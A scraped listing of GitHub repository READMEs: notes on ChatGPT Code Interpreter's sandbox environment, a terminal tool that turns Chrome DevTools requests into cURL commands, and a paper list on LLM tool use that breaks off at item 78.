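status, pano = stitcher.stitch(imgs)
if status == cv2.Stitcher_OK:
    cv2.imwrite("pano.jpg", pano)
else:
    print(f"Stitching failed with status {status}")
```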
11
3
dextersjab/code-interpreter-notes
https://github.com/dextersjab/code-interpreter-notes
Notes and insights about OpenAI's Code Interpreter
# Notes about ChatGPT's Code Interpreter ## Project Structure This repository primarily contains notes and documentation about OpenAI's Code Interpreter. Important files include: - `system_prompt.md`: the system prompt for the Code Interpreter. - `system.md`: details about the system environment where the code interpreter operates, including information about the OS, - processor, RAM, and environment variables. - `env`: the system environment variables. - `requirements.txt`: A list of Python package dependencies required for Code Interpreter. - `dev_scripts`: A directory containing utility scripts that assist in the exploration and understanding of Code Interpreter's capabilities. ## Environment Below is what Code Interpreter reveals about its working environment. ### Python Environment The Python environment in which the code is executed is based on Python 3. Python is a high-level, interpreted, and general-purpose dynamic programming language that focuses on code readability. The Python Software Foundation's standard runtime environment is used, which includes a wide variety of standard libraries. Libraries can be found in [requirements.txt](requirements.txt). ### Package Management Python packages are managed using pip, the standard package manager for Python. You can install, upgrade, and remove Python packages using pip. ### Jupyter Notebook Environment The code execution takes place in a Jupyter Notebook environment. Jupyter is an open-source web application that allows the creation and sharing of documents that contain live code, equations, visualizations, and narrative text. The Jupyter notebook is an interactive computing environment that enables users to author notebook documents that include code, widgets, plots, and narrative text. The notebook extends the console-based approach to interactive computing in a qualitatively new direction, providing a web-based application suitable for capturing the whole computation process. ### Execution Time Python code that you send for execution will time out after 120 seconds if it doesn't complete. This is to ensure that long-running code doesn't lock up the interactive environment. ### File Storage Files can be stored and persisted in the /mnt/data directory. This allows you to upload and download files from the Jupyter environment. Note that these files will be available only for the duration of your current session and will not be preserved across different sessions. ### Internet Access The Python environment does not have internet access. This means that you cannot make HTTP requests or API calls directly from your Python code. This is a security feature designed to prevent unauthorized network activity. ### Code Interpreter The OpenAI's Code Interpreter allows ChatGPT to interpret and execute Python code within the Jupyter Notebook environment. This can be used for running Python scripts, performing computations, generating plots, and more. ### Environment Isolation Each session operates in an isolated environment. This means your code won't have access to the underlying operating system, ensuring the safety and privacy of your data. ### Containerization The Python and Jupyter environments are containerized. This means that each user session is isolated within its own environment, which includes a specific version of Python and certain pre-installed packages. This isolation ensures that the Python code execution environment is consistent across all sessions and users. 
Containers are lightweight and portable, which makes it easy to manage and scale the infrastructure. ### Kubernetes Kubernetes is used to orchestrate the containers. It is responsible for deploying containers, scaling them according to demand, and managing their lifecycle. Kubernetes also handles networking between containers and provides services like load balancing, service discovery, and secret management. ### Networking Within the Kubernetes cluster, each container has its own IP address and can communicate with other containers using standard TCP/IP protocols. However, for security reasons, the containers are isolated from the internet and cannot make outgoing network requests. This means that you can't fetch data from the web or call APIs directly from your Python code. ### Storage While containers themselves are ephemeral (meaning they are destroyed when the session ends), data can be stored and persisted using volumes. In this environment, the /mnt/data directory is mounted as a volume, so you can use it to save and load files within a session. ### File Storage Files can be stored and persisted in the /mnt/data directory. This allows you to upload and download files from the Jupyter environment. The /home/sandbox directory is the default working directory, where scripts are executed and where relative paths are resolved from. Note that these files will be available only for the duration of your current session and will not be preserved across different sessions. ### Security The use of containers and Kubernetes also provides a number of security benefits. The isolation between containers helps to limit the impact of security vulnerabilities. In addition, network policies can be used to control which containers can communicate with each other, and Role-Based Access Control (RBAC) can be used to control who can access the Kubernetes API and what actions they can perform. ### User Sessions and Container Communication In the context of the Code Interpreter, each user session operates within a single, isolated container. This container includes both the language model and the Python execution environment. Importantly, containers associated with different user sessions do not communicate with each other, ensuring the privacy and security of each individual session. ## Contribution Contributions to this repository are welcome. If you have additional notes or scripts that you believe would benefit others in understanding or using OpenAI's Code Interpreter, feel free to create a pull request.
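As a small illustration of the file-storage behaviour described above (only meaningful when run inside a Code Interpreter session), writing to `/mnt/data` persists a file for the rest of the session and makes it available for download, while relative paths resolve from the default working directory:

```python
# Persist a file under /mnt/data for the duration of the current session.
from pathlib import Path

out = Path("/mnt/data/notes.txt")
out.write_text("Generated inside the Code Interpreter sandbox.\n")

print(Path.cwd())        # the default working directory (/home/sandbox)
print(out.read_text())   # the file remains readable for the rest of the session
```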
11
0
fipso/cntui
https://github.com/fipso/cntui
Replay chrome requests from your terminal using curl
# Chrome DevTools Network TUI (cnTUI) A little CLI/TUI tool to export HTTP requests to cURL commands from the terminal. Currently exports requests to your X11 clipboard using xclip. ![image](https://github.com/fipso/cntui/assets/8930842/074541a2-10a5-426a-aaad-b6051b81e5f8) ### Installation Requirements: go, xclip `git clone https://github.com/fipso/cntui.git` `go build .` `sudo cp cntui /usr/local/bin` ### Usage - Start Chrome with the DevTools server open (debug mode): `google-chrome-stable --remote-debugging-port=9222` - Select the tab you want to hack on - Run `cntui` - Select a request. Hit enter - The cURL command is now in your clipboard. Paste. Have fun ### TODO: - [ ] Edit Mode: edit post body in terminal editor - [ ] Replay request directly - [ ] Request description screen The development of this tool has been recorded on YouTube: https://www.youtube.com/watch?v=ywqy_tIq7xc&list=PLd-Mx7H0BuG9Cfsu-8oqUS54MxbaOxmg9
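The debug-mode Chrome started above also exposes an HTTP endpoint on the same port that lists the open tabs, which is a quick way to confirm that cnTUI will find something to attach to. A small sketch, assuming the Python `requests` library is installed:

```python
# List the tabs exposed by Chrome's remote debugging port (--remote-debugging-port=9222).
import requests

for target in requests.get("http://localhost:9222/json").json():
    if target.get("type") == "page":
        print(target.get("title"), "-", target.get("url"))
```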
10
0
xlang-ai/llm-tool-use
https://github.com/xlang-ai/llm-tool-use
Paper collection on LLM tool use and code generation covered in the ACL tutorial on complex reasoning
# LLM Tool Use Papers ![](https://img.shields.io/github/last-commit/xlang-ai/llm-ttol-use?color=green) ![](https://img.shields.io/badge/PaperNumber-90-brightgreen) ![](https://img.shields.io/badge/PRs-Welcome-red) ## Introduction ### Group ## Papers 1. **CLIPort: What and Where Pathways for Robotic Manipulation.** CoRL 2021 *Mohit Shridhar, Lucas Manuelli, Dieter Fox* [[pdf](https://arxiv.org/abs/2109.12098)], 2021.9 2. **Language Models as Zero-Shot Planners: Extracting Actionable Knowledge for Embodied Agents.** ICML 2022 *Wenlong Huang, Pieter Abbeel, Deepak Pathak, Igor Mordatch* [[pdf](https://arxiv.org/abs/2201.07207)], 2022.1 3. **Socratic Models: Composing Zero-Shot Multimodal Reasoning with Language.** ICLR 2023 *Andy Zeng, Maria Attarian, Brian Ichter, Krzysztof Choromanski, Adrian Wong, Stefan Welker, Federico Tombari, Aveek Purohit, Michael Ryoo, Vikas Sindhwani, Johnny Lee, Vincent Vanhoucke, Pete Florence* [[pdf](https://arxiv.org/abs/2204.00598)], 2022.4 4. **Do As I Can, Not As I Say: Grounding Language in Robotic Affordances.** CoRL 2022 *Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Chuyuan Fu, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Daniel Ho, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Eric Jang, Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, Nikhil J Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Kuang-Huei Lee, Sergey Levine, Yao Lu, Linda Luu, Carolina Parada, Peter Pastor, Jornell Quiambao, Kanishka Rao, Jarek Rettinghouse, Diego Reyes, Pierre Sermanet, Nicolas Sievers, Clayton Tan, Alexander Toshev, Vincent Vanhoucke, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Mengyuan Yan, Andy Zeng* [[pdf](https://arxiv.org/abs/2204.01691)], 2022.4 5. **TALM: Tool Augmented Language Models.** Arxiv *Aaron Parisi, Yao Zhao, Noah Fiedel* [[pdf](https://arxiv.org/abs/2205.12255)], 2022.5 6. **Inner Monologue: Embodied Reasoning through Planning with Language Models.** CoRL 2022 *Wenlong Huang, Fei Xia, Ted Xiao, Harris Chan, Jacky Liang, Pete Florence, Andy Zeng, Jonathan Tompson, Igor Mordatch, Yevgen Chebotar, Pierre Sermanet, Noah Brown, Tomas Jackson, Linda Luu, Sergey Levine, Karol Hausman, Brian Ichter* [[pdf](https://arxiv.org/abs/2207.05608)], 2022.7 7. **JARVIS: A Neuro-Symbolic Commonsense Reasoning Framework for Conversational Embodied Agents.** SoCal NLP 2022 *Kaizhi Zheng, Kaiwen Zhou, Jing Gu, Yue Fan, Jialu Wang, Zonglin Di, Xuehai He, Xin Eric Wang* [[pdf](https://arxiv.org/abs/2208.13266)], 2022.8 8. **ProgPrompt: Generating Situated Robot Task Plans using Large Language Models.** ICRA 2023 *Ishika Singh, Valts Blukis, Arsalan Mousavian, Ankit Goyal, Danfei Xu, Jonathan Tremblay, Dieter Fox, Jesse Thomason, Animesh Garg* [[pdf](https://arxiv.org/abs/2209.11302)], 2022.9 9. **Code as Policies: Language Model Programs for Embodied Control.** ICRA 2023 *Jacky Liang, Wenlong Huang, Fei Xia, Peng Xu, Karol Hausman, Brian Ichter, Pete Florence, Andy Zeng* [[pdf](https://arxiv.org/abs/2209.07753)], 2022.9 10. **Binding Language Models in Symbolic Languages.** ICLR 2023 *Zhoujun Cheng, Tianbao Xie, Peng Shi, Chengzu Li, Rahul Nadkarni, Yushi Hu, Caiming Xiong, Dragomir Radev, Mari Ostendorf, Luke Zettlemoyer, Noah A. Smith, Tao Yu* [[pdf](https://arxiv.org/abs/2210.02875)], 2022.10 11. 
**VIMA: General Robot Manipulation with Multimodal Prompts.** ICML 2023 *Yunfan Jiang, Agrim Gupta, Zichen Zhang, Guanzhi Wang, Yongqiang Dou, Yanjun Chen, Li Fei-Fei, Anima Anandkumar, Yuke Zhu, Linxi Fan* [[pdf](https://arxiv.org/abs/2210.03094)], 2022.10 12. **Synergizing Reasoning and Acting in Language Models.** ICLR 2023 *Shunyu Yao, Jeffrey Zhao, Dian Yu, Nan Du, Izhak Shafran, Karthik Narasimhan, Yuan Cao* [[pdf](https://arxiv.org/abs/2210.03629)], 2022.10 13. **Mind's Eye: Grounded Language Model Reasoning through Simulation.** ICLR 2023 *Ruibo Liu, Jason Wei, Shixiang Shane Gu, Te-Yen Wu, Soroush Vosoughi, Claire Cui, Denny Zhou, Andrew M. Dai* [[pdf](https://arxiv.org/abs/2210.05359)], 2022.10 14. **Code4Struct: Code Generation for Few-Shot Event Structure Prediction.** ACL 2023 *Xingyao Wang, Sha Li, Heng Ji* [[pdf](https://arxiv.org/abs/2210.12810)], 2022.10 15. **PAL: Program-aided Language Models.** ICML 2023 *Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, Graham Neubig* [[pdf](https://arxiv.org/abs/2211.10435)], 2022.11 16. **Visual Programming: Compositional visual reasoning without training.** CVPR 2023 *Tanmay Gupta, Aniruddha Kembhavi* [[pdf](https://arxiv.org/abs/2211.11559)], 2022.11 17. **Program of Thoughts Prompting: Disentangling Computation from Reasoning for Numerical Reasoning Tasks.** Arxiv *Wenhu Chen, Xueguang Ma, Xinyi Wang, William W. Cohen* [[pdf](https://arxiv.org/abs/2211.12588)], 2022.11 18. **Planning with Large Language Models via Corrective Re-prompting.** Neurips 2023 workshop *Shreyas Sundara Raman, Vanya Cohen, Eric Rosen, Ifrah Idrees, David Paulius, Stefanie Tellex* [[pdf](https://arxiv.org/abs/2211.09935)], 2022.11 19. **LLM-Planner: Few-Shot Grounded Planning for Embodied Agents with Large Language Models.** Arxiv *Chan Hee Song, Jiaman Wu, Clayton Washington, Brian M. Sadler, Wei-Lun Chao, Yu Su* [[pdf](https://arxiv.org/abs/2212.04088)], 2022.12 20. **RT-1: Robotics Transformer for Real-World Control at Scale.** Arxiv *Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Joseph Dabis, Chelsea Finn, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Tomas Jackson, Sally Jesmonth, Nikhil J Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Isabel Leal, Kuang-Huei Lee, Sergey Levine, Yao Lu, Utsav Malla, Deeksha Manjunath, Igor Mordatch, Ofir Nachum, Carolina Parada, Jodilyn Peralta, Emily Perez, Karl Pertsch, Jornell Quiambao, Kanishka Rao, Michael Ryoo, Grecia Salazar, Pannag Sanketi, Kevin Sayed, Jaspiar Singh, Sumedh Sontakke, Austin Stone, Clayton Tan, Huong Tran, Vincent Vanhoucke, Steve Vega, Quan Vuong, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Tianhe Yu, Brianna Zitkovich* [[pdf](https://arxiv.org/abs/2212.06817)], 2022.12 21. **Don't Generate, Discriminate: A Proposal for Grounding Language Models to Real-World Environments.** ACL 2023 *Yu Gu, Xiang Deng, Yu Su* [[pdf](https://arxiv.org/abs/2212.09736)], 2022.12 22. **Do Embodied Agents Dream of Pixelated Sheep: Embodied Decision Making using Language Guided World Modelling** ICML 2023 *Kolby Nottingham, Prithviraj Ammanabrolu, Alane Suhr, Yejin Choi, Hannaneh Hajishirzi, Sameer Singh, Roy Fox* [[pdf](https://arxiv.org/abs/2301.12050)], 2023.1 23. 
**Large language models are versatile decomposers: Decompose evidence and questions for table-based reasoning.** SIGIR 2023 *Yunhu Ye, Binyuan Hui, Min Yang, Binhua Li, Fei Huang, Yongbin Li* [[pdf](https://arxiv.org/abs/2301.13808)], 2023.1 24. **Augmented Language Models: a Survey.** Arxiv *Grégoire Mialon, Roberto Dessì, Maria Lomeli, Christoforos Nalmpantis, Ram Pasunuru, Roberta Raileanu, Baptiste Rozière, Timo Schick, Jane Dwivedi-Yu, Asli Celikyilmaz, Edouard Grave, Yann LeCun, Thomas Scialom* [[pdf](https://arxiv.org/abs/2302.07842)], 2023.2 25. **Collaborating with language models for embodied reasoning.** NeurIPS 2022 LaReL workshop *Ishita Dasgupta, Christine Kaeser-Chen, Kenneth Marino, Arun Ahuja, Sheila Babayan, Felix Hill, Rob Fergus* [[pdf](https://arxiv.org/abs/2302.00763)], 2023.2 26. **Describe, Explain, Plan and Select: Interactive Planning with Large Language Models Enables Open-World Multi-Task Agents.** Arxiv *Zihao Wang, Shaofei Cai, Anji Liu, Xiaojian Ma, Yitao Liang* [[pdf](https://arxiv.org/abs/2302.01560)], 2023.2 27. **Toolformer: Language Models Can Teach Themselves to Use Tools.** Arxiv *Timo Schick, Jane Dwivedi-Yu, Roberto Dessì, Roberta Raileanu, Maria Lomeli, Luke Zettlemoyer, Nicola Cancedda, Thomas Scialom* [[pdf](https://arxiv.org/abs/2302.04761)], 2023.2 28. **Grounded Decoding: Guiding Text Generation with Grounded Models for Robot Control.** Arxiv *Wenlong Huang, Fei Xia, Dhruv Shah, Danny Driess, Andy Zeng, Yao Lu, Pete Florence, Igor Mordatch, Sergey Levine, Karol Hausman, Brian Ichter* [[pdf](https://arxiv.org/abs/2303.00855)], 2023.3 29. **PaLM-E: An Embodied Multimodal Language Model.** Arxiv *Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, Pete Florence* [[pdf](https://arxiv.org/abs/2303.03378)], 2023.3 30. **Visual ChatGPT: Talking, Drawing and Editing with Visual Foundation Models.** Arxiv *Chenfei Wu, Shengming Yin, Weizhen Qi, Xiaodong Wang, Zecheng Tang, Nan Duan* [[pdf](https://arxiv.org/abs/2303.04671)], 2023.3 31. **ViperGPT: Visual Inference via Python Execution for Reasoning.** Arxiv *Dídac Surís, Sachit Menon, Carl Vondrick* [[pdf](https://arxiv.org/abs/2303.08128)], 2023.3 32. **ART: Automatic multi-step reasoning and tool-use for large language models.** Arxiv *Bhargavi Paranjape, Scott Lundberg, Sameer Singh, Hannaneh Hajishirzi, Luke Zettlemoyer, Marco Tulio Ribeiro* [[pdf](http://arxiv.org/abs/2303.09014)], 2023.3 33. **Text2Motion: From Natural Language Instructions to Feasible Plans** ICRA 2023 PT4R Workshop *Kevin Lin, Christopher Agia, Toki Migimatsu, Marco Pavone, Jeannette Bohg* [[pdf](https://arxiv.org/abs/2303.12153)], 2023.3 34. **TaskMatrix.AI: Completing Tasks by Connecting Foundation Models with Millions of APIs.** Arxiv *Yaobo Liang, Chenfei Wu, Ting Song, Wenshan Wu, Yan Xia, Yu Liu, Yang Ou, Shuai Lu, Lei Ji, Shaoguang Mao, Yun Wang, Linjun Shou, Ming Gong, Nan Duan* [[pdf](https://arxiv.org/abs/2303.16434)], 2023.3 35. **HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in HuggingFace.** Arxiv *Yongliang Shen, Kaitao Song, Xu Tan, Dongsheng Li, Weiming Lu, Yueting Zhuang* [[pdf](https://arxiv.org/abs/2303.17580)], 2023.3 36. 
**OpenAGI: When LLM Meets Domain Experts.** Arxiv *Yingqiang Ge, Wenyue Hua, Kai Mei, Jianchao Ji, Juntao Tan, Shuyuan Xu, Zelong Li, Yongfeng Zhang* [[pdf](https://arxiv.org/abs/2304.04370)], 2023.4 37. **API-Bank: A Benchmark for Tool-Augmented LLMs.** Arxiv *Minghao Li, Feifan Song, Bowen Yu, Haiyang Yu, Zhoujun Li, Fei Huang, Yongbin Li* [[pdf](https://arxiv.org/abs/2304.08244)], 2023.4 38. **Tool Learning with Foundation Models.** Arxiv *Yujia Qin, Shengding Hu, Yankai Lin, Weize Chen, Ning Ding, Ganqu Cui, Zheni Zeng, Yufei Huang, Chaojun Xiao, Chi Han, Yi Ren Fung, Yusheng Su, Huadong Wang, Cheng Qian, Runchu Tian, Kunlun Zhu, Shihao Liang, Xingyu Shen, Bokai Xu, Zhen Zhang, Yining Ye, Bowen Li, Ziwei Tang, Jing Yi, Yuzhang Zhu, Zhenning Dai, Lan Yan, Xin Cong, Yaxi Lu, Weilin Zhao, Yuxiang Huang, Junxi Yan, Xu Han, Xian Sun, Dahai Li, Jason Phang, Cheng Yang, Tongshuang Wu, Heng Ji, Zhiyuan Liu, Maosong Sun* [[pdf](https://arxiv.org/abs/2304.08354)], 2023.4 39. **GeneGPT: Augmenting Large Language Models with Domain Tools for Improved Access to Biomedical Information.** Arxiv *Qiao Jin, Yifan Yang, Qingyu Chen, Zhiyong Lu* [[pdf](http://arxiv.org/abs/2304.09667)], 2023.4 40. **Chameleon: Plug-and-Play Compositional Reasoning with Large Language Models.** Arxiv *Pan Lu, Baolin Peng, Hao Cheng, Michel Galley, Kai-Wei Chang, Ying Nian Wu, Song-Chun Zhu, Jianfeng Gao* [[pdf](https://arxiv.org/abs/2304.09842)], 2023.4 41. **LLM+P: Empowering Large Language Models with Optimal Planning Proficiency.** Arxiv *Bo Liu, Yuqian Jiang, Xiaohan Zhang, Qiang Liu, Shiqi Zhang, Joydeep Biswas, Peter Stone* [[pdf](https://arxiv.org/abs/2304.11477)], 2023.4 42. **Programmatically Grounded, Compositionally Generalizable Robotic Manipulation** ICLR 2023 *Renhao Wang, Jiayuan Mao, Joy Hsu, Hang Zhao, Jiajun Wu, Yang Gao* [[pdf](https://arxiv.org/abs/2304.13826)], 2023.4 43. **Search-in-the-Chain: Towards Accurate, Credible and Traceable Large Language Models for Knowledge-intensive Tasks.** Arxiv *Shicheng Xu, Liang Pang, Huawei Shen, Xueqi Cheng, Tat-Seng Chua* [[pdf](https://arxiv.org/abs/2304.14732)], 2023.4 44. **Can LLM Already Serve as A Database Interface? A BIg Bench for Large-Scale Database Grounded Text-to-SQLs.** Arxiv *Jinyang Li, Binyuan Hui, Ge Qu, Binhua Li, Jiaxi Yang, Bowen Li, Bailin Wang, Bowen Qin, Rongyu Cao, Ruiying Geng, Nan Huo, Xuanhe Zhou, Chenhao Ma, Guoliang Li, Kevin C.C. Chang, Fei Huang, Reynold Cheng, Yongbin Li* [[pdf](https://arxiv.org/abs/2305.03111)], 2023.5 45. **ToolCoder: Teach Code Generation Models to use API search tools.** Arxiv *Kechi Zhang, Ge Li, Jia Li, Zhuo Li, Zhi Jin* [[pdf](https://arxiv.org/abs/2305.04032)], 2023.5 46. **TidyBot: Personalized Robot Assistance with Large Language Models** IROS 2023 *Jimmy Wu, Rika Antonova, Adam Kan, Marion Lepert, Andy Zeng, Shuran Song, Jeannette Bohg, Szymon Rusinkiewicz, Thomas Funkhouser* [[pdf](https://arxiv.org/abs/2305.05658)], 2023.5 47. **Small models are valuable plug-ins for large language models.** Arxiv *Canwen Xu, Yichong Xu, Shuohang Wang, Yang Liu, Chenguang Zhu, Julian McAuley* [[pdf](https://arxiv.org/abs/2305.08848)], 2023.5 48. **Multimodal Web Navigation with Instruction-Finetuned Foundation Models.** ICLR 2023 Workshop ME-FoMo *Hiroki Furuta, Ofir Nachum, Kuang-Huei Lee, Yutaka Matsuo, Shixiang Shane Gu, Izzeddin Gur* [[pdf](https://arxiv.org/abs/2305.11854)], 2023.5 49. 
**ToolkenGPT: Augmenting Frozen Language Models with Massive Tools via Tool Embeddings.** Arxiv *Shibo Hao, Tianyang Liu, Zhen Wang, Zhiting Hu* [[pdf](https://arxiv.org/abs/2305.11554)], 2023.5 50. **CRITIC: Large Language Models Can Self-Correct with Tool-Interactive Critiquing.** Arxiv *Zhibin Gou, Zhihong Shao, Yeyun Gong, Yelong Shen, Yujiu Yang, Nan Duan, Weizhu Chen* [[pdf](https://arxiv.org/abs/2305.11738)], 2023.5 51. **Making Language Models Better Tool Learners with Execution Feedback.** Arxiv *Shuofei Qiao, Honghao Gui, Huajun Chen, Ningyu Zhang* [[pdf](https://arxiv.org/abs/2305.13068)], 2023.5 52. **Hierarchical Prompting Assists Large Language Model on Web Navigation.** ACL 2023 NLRSE workshop *Abishek Sridhar, Robert Lo, Frank F. Xu, Hao Zhu, Shuyan Zhou* [[pdf](https://arxiv.org/abs/2305.14257)], 2023.5 53. **PEARL: Prompting Large Language Models to Plan and Execute Actions Over Long Documents.** Arxiv *Simeng Sun, Yang Liu, Shuohang Wang, Chenguang Zhu, Mohit Iyyer* [[pdf](https://arxiv.org/abs/2305.14564)], 2023.5 54. **ReWOO: Decoupling Reasoning from Observations for Efficient Augmented Language Models.** Arxiv *Binfeng Xu, Zhiyuan Peng, Bowen Lei, Subhabrata Mukherjee, Yuchen Liu, Dongkuan Xu* [[pdf](https://arxiv.org/abs/2305.18323)], 2023.5 55. **Gorilla: Large Language Model Connected with Massive APIs.** Arxiv *Shishir G. Patil, Tianjun Zhang, Xin Wang, Joseph E. Gonzalez* [[pdf](https://arxiv.org/abs/2305.15334)], 2023.5 56. **SPRING: GPT-4 Out-performs RL Algorithms by Studying Papers and Reasoning.** Arxiv *Yue Wu, Shrimai Prabhumoye, So Yeon Min, Yonatan Bisk, Ruslan Salakhutdinov, Amos Azaria, Tom Mitchell, Yuanzhi Li* [[pdf](https://arxiv.org/abs/2305.15486)], 2023.5 57. **Leveraging Pre-trained Large Language Models to Construct and Utilize World Models for Model-based Task Planning.** Arxiv *Lin Guan, Karthik Valmeekam, Sarath Sreedharan, Subbarao Kambhampati* [[pdf](https://arxiv.org/abs/2305.14909)], 2023.5 58. **EmbodiedGPT: Vision-Language Pre-Training via Embodied Chain of Thought** Arxiv *Yao Mu, Qinglong Zhang, Mengkang Hu, Wenhai Wang, Mingyu Ding, Jun Jin, Bin Wang, Jifeng Dai, Yu Qiao, Ping Luo* [[pdf](https://arxiv.org/abs/2305.15021)], 2023.5 59. **On the Tool Manipulation Capability of Open-source Large Language Models.** Arxiv *Qiantong Xu, Fenglu Hong, Bo Li, Changran Hu, Zhengyu Chen, Jian Zhang* [[pdf](https://arxiv.org/abs/2305.16504)], 2023.5 60. **Voyager: An Open-Ended Embodied Agent with Large Language Models.** Arxiv *Guanzhi Wang, Yuqi Xie, Yunfan Jiang, Ajay Mandlekar, Chaowei Xiao, Yuke Zhu, Linxi Fan, Anima Anandkumar* [[pdf](https://arxiv.org/abs/2305.16291)], 2023.5 61. **Mindstorms in Natural Language-Based Societies of Mind** Arxiv *Mingchen Zhuge, Haozhe Liu, Francesco Faccio, Dylan R. Ashley, Róbert Csordás, Anand Gopalakrishnan, Abdullah Hamdi, Hasan Abed Al Kader Hammoud, Vincent Herrmann, Kazuki Irie, Louis Kirsch, Bing Li, Guohao Li, Shuming Liu, Jinjie Mai, Piotr Piękos, Aditya Ramesh, Imanol Schlag, Weimin Shi, Aleksandar Stanić, Wenyi Wang, Yuhui Wang, Mengmeng Xu, Deng-Ping Fan, Bernard Ghanem, Jürgen Schmidhuber* [[pdf](https://arxiv.org/abs/2305.17066)], 2023.5 62. **Large Language Models as Tool Makers.** Arxiv *Tianle Cai, Xuezhi Wang, Tengyu Ma, Xinyun Chen, Denny Zhou* [[pdf](https://arxiv.org/abs/2305.17126)], 2023.5 63. 
**GPT4Tools: Teaching Large Language Model to Use Tools via Self-instruction.** Arxiv *Rui Yang, Lin Song, Yanwei Li, Sijie Zhao, Yixiao Ge, Xiu Li, Ying Shan* [[pdf](https://arxiv.org/abs/2305.18752)], 2023.5 64. **SheetCopilot: Bringing Software Productivity to the Next Level through Large Language Models.** Arxiv *Hongxin Li, Jingran Su, Yuntao Chen, Qing Li, Zhaoxiang Zhang* [[pdf](https://arxiv.org/abs/2305.19308)], 2023.5 65. **CREATOR: Disentangling Abstract and Concrete Reasonings of Large Language Models through Tool Creation.** Arxiv *Cheng Qian, Chi Han, Yi R. Fung, Yujia Qin, Zhiyuan Liu, Heng Ji* [[pdf](https://arxiv.org/abs/2305.14318)], 2023.5 66. **SQL-PaLM: Improved Large Language ModelAdaptation for Text-to-SQL.** Arxiv *Ruoxi Sun, Sercan O. Arik, Hootan Nakhost, Hanjun Dai, Rajarishi Sinha, Pengcheng Yin, Tomas Pfister* [[pdf](https://arxiv.org/abs/2306.00739)], 2023.6 67. **From Pixels to UI Actions: Learning to Follow Instructions via Graphical User Interfaces.** Arxiv *Peter Shaw, Mandar Joshi, James Cohan, Jonathan Berant, Panupong Pasupat, Hexiang Hu, Urvashi Khandelwal, Kenton Lee, Kristina Toutanova* [[pdf](https://arxiv.org/abs/2306.00245)], 2023.6 68. **Modular Visual Question Answering via Code Generation.** ACL 2023 *Sanjay Subramanian, Medhini Narasimhan, Kushal Khangaonkar, Kevin Yang, Arsha Nagrani, Cordelia Schmid, Andy Zeng, Trevor Darrell, Dan Klein* [[pdf](https://arxiv.org/abs/2306.05392)], 2023.6 69. **ToolAlpaca: Generalized Tool Learning for Language Models with 3000 Simulated Cases.** Arxiv *Qiaoyu Tang, Ziliang Deng, Hongyu Lin, Xianpei Han, Qiao Liang, Le Sun* [[pdf](https://arxiv.org/abs/2306.05301)], 2023.6 70. **Embodied Executable Policy Learning with Language-based Scene Summarization** Arxiv *Jielin Qiu, Mengdi Xu, William Han, Seungwhan Moon, Ding Zhao* [[pdf](https://arxiv.org/abs/2306.05696)], 2023.6 71. **Mind2Web: Towards a Generalist Agent for the Web.** Arxiv *Xiang Deng, Yu Gu, Boyuan Zheng, Shijie Chen, Samuel Stevens, Boshi Wang, Huan Sun, Yu Su* [[pdf](https://arxiv.org/abs/2306.06070)], 2023.6 72. **Can Language Models Teach Weaker Agents? Teacher Explanations Improve Students via Theory of Mind.** Arxiv *Swarnadeep Saha, Peter Hase, Mohit Bansal* [[pdf](https://arxiv.org/abs/2306.09299)], 2023.6 73. **Generating Language Corrections for Teaching Physical Control Tasks** ICML 2023 *Megha Srivastava, Noah Goodman, Dorsa Sadigh* [[pdf](https://arxiv.org/abs/2306.07012)], 2023.6 74. **Data-Copilot: Bridging Billions of Data and Humans with Autonomous Workflow.** Arxiv *Wenqi Zhang, Yongliang Shen, Weiming Lu, Yueting Zhuang* [[pdf](https://arxiv.org/abs/2306.07209)], 2023.6 75. **SayTap: Language to Quadrupedal Locomotion** Arxiv *Yujin Tang, Wenhao Yu, Jie Tan, Heiga Zen, Aleksandra Faust, Tatsuya Harada* [[pdf](https://arxiv.org/abs/2306.07580)], 2023.6 76. **Language to Rewards for Robotic Skill Synthesis** Arxiv *Wenhao Yu, Nimrod Gileadi, Chuyuan Fu, Sean Kirmani, Kuang-Huei Lee, Montse Gonzalez Arenas, Hao-Tien Lewis Chiang, Tom Erez, Leonard Hasenclever, Jan Humplik, Brian Ichter, Ted Xiao, Peng Xu, Andy Zeng, Tingnan Zhang, Nicolas Heess, Dorsa Sadigh, Jie Tan, Yuval Tassa, Fei Xia* [[pdf](https://arxiv.org/abs/2306.08647)], 2023.6 77. **REFLECT: Summarizing Robot Experiences for Failure Explanation and Correction** Arxiv *Zeyi Liu, Arpit Bahety, Shuran Song* [[pdf](https://arxiv.org/abs/2306.15724)], 2023.6 78. 
